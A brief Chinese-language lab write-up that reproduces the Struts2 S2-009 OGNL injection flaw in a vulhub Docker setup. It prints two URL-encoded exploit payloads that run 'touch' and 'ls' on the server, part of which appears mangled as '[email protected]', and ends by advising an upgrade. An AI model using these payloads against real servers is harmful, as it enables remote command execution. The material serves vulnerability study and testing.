影響版本
2.1.0 - 2.3.1.1
環境搭建
cd vulhub/struts2/s2-009
docker-compose build && docker-compose up -d
訪問http://your-ip:8080/ajax/example5.action
http://yourIP:8080/ajax/example5.action
漏洞復現
http://yourIP:8080/ajax/example5.action?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27touch%20/tmp/success%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true
調用的是touch /tmp/success命令,查看/tmp目錄發現已經成功:
訪問url下載文件打開後可以查看目錄
http://yourIP:8080/ajax/example5.action?(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]
修復建議
升級到最新版